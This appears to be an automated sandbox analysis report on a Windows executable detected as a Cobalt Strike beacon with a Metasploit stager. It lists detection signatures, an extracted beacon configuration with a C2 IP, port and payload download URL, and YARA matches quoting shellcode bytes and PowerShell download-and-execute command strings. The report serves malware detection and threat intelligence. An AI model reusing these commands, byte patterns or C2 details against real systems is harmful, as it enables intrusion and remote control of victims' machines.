Edit tour

Windows Analysis Report
vNenBbeRFZ.exe

Overview

General Information

Sample name:	vNenBbeRFZ.exe renamed because original name is a hash value
Original sample name:	d5b1b322ca3997b573d687fdd9b4df96.exe
Analysis ID:	1528606
MD5:	d5b1b322ca3997b573d687fdd9b4df96
SHA1:	ece9872b58cd0bcf5ff9d555bbfb846745828d4e
SHA256:	9d9914994550a46c55c6869d3fdf223e2a71b11707cc7ea26f0ae2855b1702c7
Tags:	32CobaltStrikeexetrojan
Infos:

Detection

CobaltStrike, Metasploit, ReflectiveLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected CobaltStrike

Yara detected Metasploit Payload

Yara detected Powershell download and execute

Yara detected ReflectiveLoader

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Contains functionality to detect sleep reduction / modifications

Found potential dummy code loops (likely to delay analysis)

Machine Learning detection for sample

Uses known network protocols on non-standard ports

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found decision node followed by non-executed suspicious APIs

Found evasive API chain (date check)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

May check if the current machine is a sandbox (GetTickCount - Sleep)

May sleep (evasive loops) to hinder dynamic analysis

Program does not show much activity (idle)

Sample execution stops while process was sleeping (likely an evasion)

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

vNenBbeRFZ.exe (PID: 6476 cmdline: "C:\Users\user\Desktop\vNenBbeRFZ.exe" MD5: D5B1B322CA3997B573D687FDD9B4DF96)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Cobalt Strike, CobaltStrike	Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit.The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.	APT 29 APT32 APT41 AQUATIC PANDA Anunak Cobalt Codoso CopyKittens DarkHydrus Earth Baxia FIN6 FIN7 Leviathan Mustang Panda Shell Crew Stone Panda TianWu UNC1878 UNC2452 Winnti Umbrella	http://blog.morphisec.com/new-global-attack-on-point-of-sale-systems http://blog.nsfocus.net/murenshark http://stillu.cc/assets/slides/2023-08-Unmasking%20CamoFei.pdf http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa http://www.secureworks.com/research/threat-profiles/gold-drake	https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike

Malware Configuration

Threatname: CobaltStrike

{"BeaconType": ["HTTP"], "Port": 9999, "SleepTime": 60000, "MaxGetSize": 1048576, "Jitter": 0, "C2Server": "47.239.242.141,/ga.js", "HttpPostUri": "/submit.php", "Malleable_C2_Instructions": [], "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\rundll32.exe", "Spawnto_x64": "%windir%\\sysnative\\rundll32.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 391144938, "bStageCleanup": "False", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "True", "bProcInject_UseRWX": "True", "bProcInject_MinAllocSize": 0, "ProcInject_PrependAppend_x86": "Empty", "ProcInject_PrependAppend_x64": "Empty", "ProcInject_Execute": ["CreateThread", "SetThreadContext", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "VirtualAllocEx", "bUsesCookies": "True", "HostHeader": ""}

Threatname: Metasploit

{"Headers": "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; BOIE9;ENUSMSNIP)\r\n", "Type": "Metasploit Download", "URL": "http://47.239.242.141/BQPy"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
vNenBbeRFZ.exe	JoeSecurity_CobaltStrike_4	Yara detected CobaltStrike	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.4136642076.0000000000110000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
00000000.00000002.4136642076.0000000000110000.00000020.00001000.00020000.00000000.sdmp	Windows_Shellcode_Generic_8c487e57	unknown	unknown	0x0:$a: FC E8 89 00 00 00 60 89 E5 31 D2 64 8B 52 30 8B 52 0C 8B 52 14 8B 72 28 0F B7 4A 26 31 FF 31 C0
00000000.00000002.4136642076.0000000000110000.00000020.00001000.00020000.00000000.sdmp	Windows_Trojan_Metasploit_38b8ceec	Identifies the API address lookup function used by metasploit. Also used by other tools (like beacon).	unknown	0x7:$a1: 89 E5 31 D2 64 8B 52 30 8B 52 0C 8B 52 14 8B 72 28 0F B7 4A 26 31 FF 31 C0 AC 3C 61
00000000.00000002.4136642076.0000000000110000.00000020.00001000.00020000.00000000.sdmp	Windows_Trojan_Metasploit_24338919	Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon).	unknown	0x90:$a1: 68 6E 65 74 00 68 77 69 6E 69 54 68 4C 77 26 07
00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Metasploit_7bc0f998	Identifies the API address lookup function leverage by metasploit shellcode	unknown	0x87:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Metasploit_c9773203	Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.	unknown	0xf3:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_2	Yara detected CobaltStrike	Joe Security
00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x2dc7e:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2dcf6:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2e460:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset. 0x2e789:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x2e71b:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x2e789:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x2dd59:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2deea:$a7: could not run command (w/ token) because of its length of %d bytes! 0x2dd9f:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2dddd:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x2e7d3:$a10: powershell -nop -exec bypass -EncodedCommand "%s" 0x2e04a:$a11: Could not open service control manager on %s: %d 0x2e57c:$a12: %d is an x64 process (can't inject x86 content) 0x2e5ac:$a13: %d is an x86 process (can't inject x64 content) 0x2e8c4:$a14: Failed to impersonate logged on user %d (%u) 0x2e535:$a15: could not create remote thread in %d: %d 0x2de13:$a16: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2e4e3:$a17: could not write to process memory: %d 0x2e07b:$a18: Could not create service %s on %s: %d 0x2e104:$a19: Could not delete service %s on %s: %d 0x2df64:$a20: Could not open process token: %d (%u)
00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x8841:$beacon_loader_x86_2: 81 E1 FF FF FF 00 81 F9 41 41 41 00 75 1D 8B 55 D8 81 E2 FF FF FF 00 81 FA 42 42 42 00 75 0x94e1:$beacon_loader_x86_2: 81 E1 FF FF FF 00 81 F9 41 41 41 00 75 1D 8B 55 D8 81 E2 FF FF FF 00 81 FA 42 42 42 00 75
00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Metasploit_7bc0f998	Identifies the API address lookup function leverage by metasploit shellcode	unknown	0x326d5:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Metasploit_c9773203	Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.	unknown	0x32741:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp	CobaltStrike_Unmodifed_Beacon	Detects unmodified CobaltStrike beacon DLL	yara@s3c.za.net	0x3048c:$loader_export: ReflectiveLoader 0x30480:$exportname: beacon.dll
00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth	0x2e7d3:$x1: powershell -nop -exec bypass -EncodedCommand "%s" 0x2e5ac:$x2: %d is an x86 process (can't inject x64 content) 0x2e789:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x2e86d:$x4: Failed to impersonate token from %d (%u) 0x2e8c4:$x5: Failed to impersonate logged on user %d (%u) 0x2dc7e:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp	Trojan_Raw_Generic_4	unknown	unknown	0x8ef9:$s0: 83 C6 02 8B 7D D8 B9 40 00 00 00 F3 A4 0F B6 55 18 52 6A 40 8B 45 D8 50 E8 B9 FA FF FF 83 C4 0C 8B 4D D8 51 8B 55 14 52 8B 45 08 8B 48 04 FF D1 0x9b99:$s0: 83 C6 02 8B 7D D8 B9 40 00 00 00 F3 A4 0F B6 55 18 52 6A 40 8B 45 D8 50 E8 B9 FA FF FF 83 C4 0C 8B 4D D8 51 8B 55 14 52 8B 45 08 8B 48 04 FF D1 0x8a39:$s1: 0F B7 11 81 FA 4D 5A 00 00 75 2E 8B 45 F8 8B 48 3C 89 4D FC 83 7D FC 40 72 1F 81 7D FC 00 04 00 00 73 16 8B 55 FC 03 55 F8 89 55 FC 8B 45 FC 81 38 50 45 00 00 75 02 EB 0B 8B 4D F8 83 E9 01 89 ... 0x96d9:$s1: 0F B7 11 81 FA 4D 5A 00 00 75 2E 8B 45 F8 8B 48 3C 89 4D FC 83 7D FC 40 72 1F 81 7D FC 00 04 00 00 73 16 8B 55 FC 03 55 F8 89 55 FC 8B 45 FC 81 38 50 45 00 00 75 02 EB 0B 8B 4D F8 83 E9 01 89 ...
00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x2f430:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f4a8:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2fc12:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset. 0x2ff3b:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x2fecd:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x2ff3b:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x2f50b:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f69c:$a7: could not run command (w/ token) because of its length of %d bytes! 0x2f551:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f58f:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x2ff85:$a10: powershell -nop -exec bypass -EncodedCommand "%s" 0x2f7fc:$a11: Could not open service control manager on %s: %d 0x2fd2e:$a12: %d is an x64 process (can't inject x86 content) 0x2fd5e:$a13: %d is an x86 process (can't inject x64 content) 0x30076:$a14: Failed to impersonate logged on user %d (%u) 0x2fce7:$a15: could not create remote thread in %d: %d 0x2f5c5:$a16: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2fc95:$a17: could not write to process memory: %d 0x2f82d:$a18: Could not create service %s on %s: %d 0x2f8b6:$a19: Could not delete service %s on %s: %d 0x2f716:$a20: Could not open process token: %d (%u)
00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x93f3:$beacon_loader_x86_2: 81 E1 FF FF FF 00 81 F9 41 41 41 00 75 1D 8B 55 D8 81 E2 FF FF FF 00 81 FA 42 42 42 00 75 0xa093:$beacon_loader_x86_2: 81 E1 FF FF FF 00 81 F9 41 41 41 00 75 1D 8B 55 D8 81 E2 FF FF FF 00 81 FA 42 42 42 00 75
00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp	Beacon_K5om	Detects Meterpreter Beacon - file K5om.dll	Florian Roth	0x2ff3b:$x1: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x2ff85:$x2: powershell -nop -exec bypass -EncodedCommand "%s" 0x2fd5e:$x3: %d is an x86 process (can't inject x64 content) 0x2f716:$s1: Could not open process token: %d (%u) 0x2f430:$s3: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f7d9:$s4: Could not connect to pipe (%s): %d
00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp	CobaltStrike_Unmodifed_Beacon	Detects unmodified CobaltStrike beacon DLL	yara@s3c.za.net	0x31c3e:$loader_export: ReflectiveLoader 0x31c32:$exportname: beacon.dll
00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp	Leviathan_CobaltStrike_Sample_1	Detects Cobalt Strike sample from Leviathan report	Florian Roth	0x2fd2e:$x2: %d is an x64 process (can't inject x86 content) 0x30076:$x3: Failed to impersonate logged on user %d (%u) 0x2ff85:$s1: powershell -nop -exec bypass -EncodedCommand "%s" 0x2ff3b:$s2: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x2f69c:$s3: could not run command (w/ token) because of its length of %d bytes! 0x2fc95:$s4: could not write to process memory: %d 0x2f430:$s5: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f7d9:$s6: Could not connect to pipe (%s): %d
00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp	crime_win32_csbeacon_1	Detects Cobalt Strike loader	@VK_Intel	0x30408:$str1: %s (admin) 0x31c32:$str2: beacon.dll
00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth	0x2ff85:$x1: powershell -nop -exec bypass -EncodedCommand "%s" 0x2fd5e:$x2: %d is an x86 process (can't inject x64 content) 0x2ff3b:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x3001f:$x4: Failed to impersonate token from %d (%u) 0x30076:$x5: Failed to impersonate logged on user %d (%u) 0x2f430:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x31c3d:$s1: _ReflectiveLoader@ 0x31c3e:$s2: ReflectiveLoader@
00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp	MALWARE_Win_CobaltStrike	CobaltStrike payload	ditekSHen	0x2ff13:$s1: %%IMPORT%% 0x2f414:$s2: www6.%x%x.%s 0x2f408:$s3: cdn.%x%x.%s 0x2f690:$s4: api.%x%x.%s 0x30408:$s5: %s (admin) 0x2f6ff:$s6: could not spawn %s: %d 0x2ffb7:$s7: Could not kill %d: %d 0x2f7d9:$s8: Could not connect to pipe (%s): %d 0x2f421:$s9: %s.1%x.%x%x.%s 0x2f430:$s9: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f4a8:$s9: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f50b:$s9: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f551:$s9: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f58f:$s9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x2f5c5:$s9: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f5ee:$s9: %s.1%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f613:$s9: %s.1%08x%08x%08x%08x%08x.%x%x.%s 0x2f634:$s9: %s.1%08x%08x%08x%08x.%x%x.%s 0x2f651:$s9: %s.1%08x%08x%08x.%x%x.%s 0x2f66a:$s9: %s.1%08x%08x.%x%x.%s 0x2f67f:$s9: %s.1%08x.%x%x.%s
Process Memory Space: vNenBbeRFZ.exe PID: 6476	JoeSecurity_CobaltStrike_2	Yara detected CobaltStrike	Joe Security
Process Memory Space: vNenBbeRFZ.exe PID: 6476	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
Process Memory Space: vNenBbeRFZ.exe PID: 6476	JoeSecurity_CobaltStrike_1	Yara detected CobaltStrike	Joe Security
Process Memory Space: vNenBbeRFZ.exe PID: 6476	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: vNenBbeRFZ.exe PID: 6476	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
Process Memory Space: vNenBbeRFZ.exe PID: 6476	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
Process Memory Space: vNenBbeRFZ.exe PID: 6476	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x29c0:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x1059a:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2a38:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x10612:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x319d:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset. 0x10d77:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset. 0x34bc:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x11096:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x344e:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x34bc:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x11028:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x11096:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x2a9b:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x10675:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2c2c:$a7: could not run command (w/ token) because of its length of %d bytes! 0x10806:$a7: could not run command (w/ token) because of its length of %d bytes! 0x2ae1:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x106bb:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2b1f:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x106f9:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x3506:$a10: powershell -nop -exec bypass -EncodedCommand "%s"
Process Memory Space: vNenBbeRFZ.exe PID: 6476	CobaltStrike_Unmodifed_Beacon	Detects unmodified CobaltStrike beacon DLL	yara@s3c.za.net	0x56aa:$loader_export: ReflectiveLoader 0x56c8:$loader_export: ReflectiveLoader 0x13284:$loader_export: ReflectiveLoader 0x132a2:$loader_export: ReflectiveLoader 0x569e:$exportname: beacon.dll 0x56bd:$exportname: beacon.dll 0x13278:$exportname: beacon.dll 0x13297:$exportname: beacon.dll
Process Memory Space: vNenBbeRFZ.exe PID: 6476	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth	0x3506:$x1: powershell -nop -exec bypass -EncodedCommand "%s" 0x110e0:$x1: powershell -nop -exec bypass -EncodedCommand "%s" 0x32e9:$x2: %d is an x86 process (can't inject x64 content) 0x10ec3:$x2: %d is an x86 process (can't inject x64 content) 0x34bc:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x11096:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x35a0:$x4: Failed to impersonate token from %d (%u) 0x1117a:$x4: Failed to impersonate token from %d (%u) 0x35f7:$x5: Failed to impersonate logged on user %d (%u) 0x111d1:$x5: Failed to impersonate logged on user %d (%u) 0x29c0:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x1059a:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
Click to see the 33 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.vNenBbeRFZ.exe.400000.0.unpack	JoeSecurity_CobaltStrike_4	Yara detected CobaltStrike	Joe Security
0.2.vNenBbeRFZ.exe.400000.0.unpack	JoeSecurity_CobaltStrike_4	Yara detected CobaltStrike	Joe Security
0.2.vNenBbeRFZ.exe.3d70000.1.raw.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0.2.vNenBbeRFZ.exe.3d70000.1.raw.unpack	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
0.2.vNenBbeRFZ.exe.3d70000.1.raw.unpack	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
0.2.vNenBbeRFZ.exe.3d70000.1.raw.unpack	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x2f430:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f4a8:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2fc12:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset. 0x2ff3b:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x2fecd:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x2ff3b:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x2f50b:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f69c:$a7: could not run command (w/ token) because of its length of %d bytes! 0x2f551:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f58f:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x2ff85:$a10: powershell -nop -exec bypass -EncodedCommand "%s" 0x2f7fc:$a11: Could not open service control manager on %s: %d 0x2fd2e:$a12: %d is an x64 process (can't inject x86 content) 0x2fd5e:$a13: %d is an x86 process (can't inject x64 content) 0x30076:$a14: Failed to impersonate logged on user %d (%u) 0x2fce7:$a15: could not create remote thread in %d: %d 0x2f5c5:$a16: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2fc95:$a17: could not write to process memory: %d 0x2f82d:$a18: Could not create service %s on %s: %d 0x2f8b6:$a19: Could not delete service %s on %s: %d 0x2f716:$a20: Could not open process token: %d (%u)
0.2.vNenBbeRFZ.exe.3d70000.1.raw.unpack	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x93f3:$beacon_loader_x86_2: 81 E1 FF FF FF 00 81 F9 41 41 41 00 75 1D 8B 55 D8 81 E2 FF FF FF 00 81 FA 42 42 42 00 75 0xa093:$beacon_loader_x86_2: 81 E1 FF FF FF 00 81 F9 41 41 41 00 75 1D 8B 55 D8 81 E2 FF FF FF 00 81 FA 42 42 42 00 75
